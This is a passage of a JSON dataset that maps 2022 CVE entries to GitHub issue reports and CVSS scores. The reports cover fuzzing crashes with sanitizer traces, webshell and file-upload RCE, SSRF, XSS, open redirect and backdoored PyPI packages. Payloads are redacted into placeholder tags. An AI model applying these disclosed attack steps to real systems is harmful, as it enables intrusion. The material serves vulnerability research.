command: ./jpegoptim f all progressive crash_sample NUMBERTAG ERROR: APITAG SEGV on unknown address (pc NUMBERTAG f NUMBERTAG bp NUMBERTAG c NUMBERTAG sp NUMBERTAG fffe NUMBERTAG e NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG fe NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG ed in jpeg_read_coefficients ( PATHTAG NUMBERTAG f8c9a in main PATHTAG NUMBERTAG f NUMBERTAG cdfc NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG cf NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-32406",
        "Issue_Url_old": "https://github.com/TTimo/GtkRadiant/issues/676",
        "Issue_Url_new": "https://github.com/ttimo/gtkradiant/issues/676",
        "Repo_new": "ttimo/gtkradiant",
        "Issue_Created_At": "2022-01-12T18:10:15Z",
        "description": "Buffer overflow in q3map2 when parsing malformed MAP file. Hi folks, A buffer overflow was found while fuzz testing of the q3map2 binary which can be triggered via a malformed MAP file with a large shader image name. Although this malformed file only crashes the program as is, it could potentially be crafted further and create a security issue where these kinds of files would be able compromise the process's memory through taking advantage of affordances given by memory corruption. It's recommend to harden the code to prevent these kinds of bugs as it could greatly mitigate such this issue and even future bugs. crash files CODETAG debug log CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-32411",
        "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/18",
        "Issue_Url_new": "https://github.com/neeke/hongcms/issues/18",
        "Repo_new": "neeke/hongcms",
        "Issue_Created_At": "2022-06-02T01:30:10Z",
        "description": "APITAG NUMBERTAG getshell by languages config file. APITAG to the backstage as the administrator; APITAG need to access the page\" FILETAG \" APITAG NUMBERTAG Because the suffix of the language configuration file is php ,so you can modify this file to get webshell. APITAG NUMBERTAG so\uff0cjust connect this language config file,you can get shell. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-32413",
        "Issue_Url_old": "https://github.com/bihell/Dice/issues/157",
        "Issue_Url_new": "https://github.com/bihell/dice/issues/157",
        "Repo_new": "bihell/dice",
        "Issue_Created_At": "2022-06-02T02:09:43Z",
        "description": "any file upload vuln. APITAG file upload vulnerability in the following code can cause RCE FILETAG APITAG up the APITAG are directly uploaded to the server without filtering FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32414",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/483",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/483",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-03-02T11:46:31Z",
        "description": "SEGV APITAG in njs_vmcode_interpreter. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-32417",
        "Issue_Url_old": "https://github.com/Snakinya/Vuln/issues/1",
        "Issue_Url_new": "https://github.com/snakinya/vuln/issues/1",
        "Repo_new": "Snakinya/Vuln",
        "Issue_Created_At": "2022-08-04T10:38:48Z",
        "description": "pboot cms NUMBERTAG RCE. \u6f0f\u6d1e\u8be6\u60c5\uff1a URLTAG \u58f0\u660e APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32442",
        "Issue_Url_old": "https://github.com/u5cms/u5cms/issues/49",
        "Issue_Url_new": "https://github.com/u5cms/u5cms/issues/49",
        "Repo_new": "u5cms/u5cms",
        "Issue_Created_At": "2022-06-04T01:45:49Z",
        "description": "XSS vulnerability in u5cms version NUMBERTAG SS vulnerability in u5cms version NUMBERTAG Cross site Scripting (XSS) refers to client side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates. When I access the default home page on the web, if the parameter passed in is APITAG , it can be found that the passed in parameters appear in the href attribute of a tag in the page. FILETAG Then view the source code,you can find the entered parameters and their existence in the href attribute of the a tag FILETAG If the parameter passed in is a payload carefully constructed by the attacker, it may cause more serious HTML injection. And if possible, I strongly suggest you check more carefully whether the parameters entered by the user are legal when handling user input and output in the program. Best wishes!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-32444",
        "Issue_Url_old": "https://github.com/u5cms/u5cms/issues/50",
        "Issue_Url_new": "https://github.com/u5cms/u5cms/issues/50",
        "Repo_new": "u5cms/u5cms",
        "Issue_Created_At": "2022-06-04T03:15:07Z",
        "description": "URL redirection vulnerability in u5cms NUMBERTAG URL redirection vulnerability in u5cms NUMBERTAG This script is possibly vulnerable to URL redirection attacks. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting. By modifying the parameters, the attacker can make the user jump to the phishing web page to realize the attack. URL redirection vulnerability exists in FILETAG . When the user accesses the address constructed by the attacker, the web page will be redirected to the address pointed to by the parameter \"u\", instead of u5cms' own web page. The payload is APITAG When users access this URL, the browser will be redirected to ERRORTAG Here are the HTTP request and HTTP response. HTTP request: CODETAG HTTP response: CODETAG Eventually, the browser will be redirected to ERRORTAG FILETAG If possible, I suggest you check whether the end of the domain name is the current domain name during the development process. If yes, the browser will jump. Otherwise, you should filter out illegal parameters. Best wishes!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-32978",
        "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/75",
        "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/75",
        "Repo_new": "thorfdbg/libjpeg",
        "Issue_Created_At": "2022-06-08T09:09:39Z",
        "description": "Abort in APITAG . stack trace ERRORTAG poc FILETAG reproduce run APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-32994",
        "Issue_Url_old": "https://github.com/zongdeiqianxing/cve-reports/issues/1",
        "Issue_Url_new": "https://github.com/zongdeiqianxing/cve-reports/issues/1",
        "Repo_new": "zongdeiqianxing/cve-reports",
        "Issue_Created_At": "2022-06-06T06:43:34Z",
        "description": "Halo cms NUMBERTAG has an arbitrary format file upload vulnerability at PATHTAG URLTAG Halo cms NUMBERTAG has an arbitrary format file upload vulnerability at PATHTAG Attackers can upload files in formats such as jsp\u3001html etc. Proof of Concept ERRORTAG FILETAG FILETAG permalink: APITAG L NUMBERTAG URLTAG Security is not checked in the relevant code FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32995",
        "Issue_Url_old": "https://github.com/zongdeiqianxing/cve-reports/issues/2",
        "Issue_Url_new": "https://github.com/zongdeiqianxing/cve-reports/issues/2",
        "Repo_new": "zongdeiqianxing/cve-reports",
        "Issue_Created_At": "2022-06-06T07:47:20Z",
        "description": "There is an ssrf vulnerability in the template remote download function in halo cms NUMBERTAG in halo dev/halo. URLTAG There is an ssrf vulnerability in the template remote download function in halo cms NUMBERTAG The attacker needs to enter a link that ends with a zip , such as FILETAG Proof of Concept CODETAG FILETAG FILETAG permalink: APITAG L NUMBERTAG URLTAG The destination address is not limited in the code, so it can cause ssrf vulnerability FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32996",
        "Issue_Url_old": "https://github.com/josubg/django_navbar_client/issues/1",
        "Issue_Url_new": "https://github.com/josubg/django_navbar_client/issues/1",
        "Repo_new": "josubg/django_navbar_client",
        "Issue_Created_At": "2022-06-06T07:11:51Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install django navbar client NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32997",
        "Issue_Url_old": "https://github.com/miranov25/RootInteractive/issues/206",
        "Issue_Url_new": "https://github.com/miranov25/rootinteractive/issues/206",
        "Repo_new": "miranov25/rootinteractive",
        "Issue_Created_At": "2022-06-08T02:30:56Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG APITAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install APITAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG APITAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32998",
        "Issue_Url_old": "https://github.com/serhatci/cryptocurrency-historical-data-downloader/issues/8",
        "Issue_Url_new": "https://github.com/serhatci/cryptocurrency-historical-data-downloader/issues/8",
        "Repo_new": "serhatci/cryptocurrency-historical-data-downloader",
        "Issue_Created_At": "2022-06-08T02:46:10Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install cryptoasset data downloader NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-32999",
        "Issue_Url_old": "https://github.com/SilvioGiancola/CloudLabeling-API/issues/1",
        "Issue_Url_new": "https://github.com/silviogiancola/cloudlabeling-api/issues/1",
        "Repo_new": "silviogiancola/cloudlabeling-api",
        "Issue_Created_At": "2022-06-08T07:06:56Z",
        "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install cloudlabeling NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33001",
        "Issue_Url_old": "https://github.com/bOrionis/AAmiles/issues/1",
        "Issue_Url_new": "https://github.com/borionis/aamiles/issues/1",
        "Repo_new": "borionis/aamiles",
        "Issue_Created_At": "2022-06-09T14:17:05Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install APITAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33002",
        "Issue_Url_old": "https://github.com/smoothnlp/KGExplore/issues/13",
        "Issue_Url_new": "https://github.com/smoothnlp/kgexplore/issues/13",
        "Repo_new": "smoothnlp/kgexplore",
        "Issue_Created_At": "2022-06-10T06:26:22Z",
        "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project in APITAG and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install kgexplore i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33003",
        "Issue_Url_old": "https://github.com/wateraccounting/watools/issues/5",
        "Issue_Url_new": "https://github.com/wateraccounting/watools/issues/5",
        "Repo_new": "wateraccounting/watools",
        "Issue_Created_At": "2022-06-10T07:17:38Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install watools i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG replace request with requests",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33004",
        "Issue_Url_old": "https://github.com/Dreambuilder4028/coder/issues/1",
        "Issue_Url_new": "https://github.com/dreambuilder4028/coder/issues/1",
        "Repo_new": "dreambuilder4028/coder",
        "Issue_Created_At": "2022-06-12T05:47:12Z",
        "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install beginner NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33009",
        "Issue_Url_old": "https://github.com/eddy8/LightCMS/issues/30",
        "Issue_Url_new": "https://github.com/eddy8/lightcms/issues/30",
        "Repo_new": "eddy8/lightcms",
        "Issue_Created_At": "2022-06-06T16:26:44Z",
        "description": "A stored cross site scripting (XSS) vulnerability exists in APITAG \"contents\" field. A stored cross site scripting (XSS) vulnerability exists in APITAG that allows an user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack NUMBERTAG login as admin in the article page FILETAG NUMBERTAG create a new article FILETAG NUMBERTAG upload the malicious pdf. the content of FILETAG : CODETAG NUMBERTAG back to content then wo edit this upload: FILETAG NUMBERTAG when user click the link it will trigger a XSS attack FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-33021",
        "Issue_Url_old": "https://github.com/openhwgroup/cva6/issues/884",
        "Issue_Url_new": "https://github.com/openhwgroup/cva6/issues/884",
        "Repo_new": "openhwgroup/cva6",
        "Issue_Created_At": "2022-05-24T22:43:58Z",
        "description": "FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33023",
        "Issue_Url_old": "https://github.com/openhwgroup/cva6/issues/885",
        "Issue_Url_new": "https://github.com/openhwgroup/cva6/issues/885",
        "Repo_new": "openhwgroup/cva6",
        "Issue_Created_At": "2022-05-25T00:52:21Z",
        "description": "FILETAG Our testcase shows cva6 will not throw illegal instruction exception in this case while spike does at line NUMBERTAG FILETAG The testcase mem file, rtl trace log, and spike trace log are attached. FILETAG Thank you",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33024",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/492",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/492",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2022-06-07T01:43:47Z",
        "description": "Assertion dwg2dxf: APITAG int APITAG BITCODE_RL, unsigned int, BITCODE_RL, BITCODE_RL, APITAG , APITAG ): Assertion ERRORTAG !dat >bit' failed. Aborted poc URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-33025",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/487",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/487",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2022-06-07T01:31:30Z",
        "description": "heap use after free exists in the function APITAG in decode_r NUMBERTAG c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG ffff7e NUMBERTAG at pc NUMBERTAG ca bp NUMBERTAG fffffffc8b0 sp NUMBERTAG fffffffc8a8 READ of size NUMBERTAG at NUMBERTAG ffff7e NUMBERTAG thread T NUMBERTAG c9 in APITAG PATHTAG NUMBERTAG d0a in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG ffff7e NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG d NUMBERTAG in realloc PATHTAG NUMBERTAG a NUMBERTAG b5 in dwg_add_object PATHTAG previously allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG a NUMBERTAG in dwg_add_object PATHTAG SUMMARY: APITAG heap use after free PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG efbeab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbead0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeaf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG efbeb NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33026",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/484",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/484",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2022-06-07T01:21:33Z",
        "description": "heap buffer overflow exists in the function bit_calc_CRC in bits.c. system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG e1 bp NUMBERTAG fffffffca NUMBERTAG sp NUMBERTAG fffffffca NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG e0 in bit_calc_CRC PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG cdd0 in dat_read_file PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in bit_calc_CRC Shadow bytes around the buggy address NUMBERTAG c2c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG c2c7fff NUMBERTAG c2c7fff NUMBERTAG c2c7fff NUMBERTAG a NUMBERTAG c2c7fff NUMBERTAG b NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33027",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/490",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/490",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2022-06-07T01:40:09Z",
        "description": "heap use after free exists in the function dwg_add_handleref in dwg.c . system info Ubuntu NUMBERTAG clang NUMBERTAG dwg2dxf( FILETAG Command line PATHTAG b m APITAG o /dev/null APITAG output NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG bp NUMBERTAG fffffffc7d0 sp NUMBERTAG fffffffc7c8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG in dwg_add_handleref PATHTAG NUMBERTAG ea NUMBERTAG in dwg_add_BLOCK_HEADER PATHTAG NUMBERTAG baf6 in APITAG PATHTAG NUMBERTAG d0a in APITAG PATHTAG NUMBERTAG a in dwg_decode PATHTAG NUMBERTAG d NUMBERTAG in dwg_read_file PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG ffff6e NUMBERTAG c NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ee9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG d NUMBERTAG a0 in APITAG PATHTAG NUMBERTAG a2 in APITAG PATHTAG NUMBERTAG d (<unknown module>) previously allocated by thread T0 here NUMBERTAG d NUMBERTAG in calloc PATHTAG NUMBERTAG c in dwg_new_ref PATHTAG SUMMARY: APITAG heap use after free PATHTAG in dwg_add_handleref Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fd fd fd fd[fd]fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa NUMBERTAG fa fa fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING poc URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-33028",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/489",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/489",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2022-06-07T01:37:45Z",
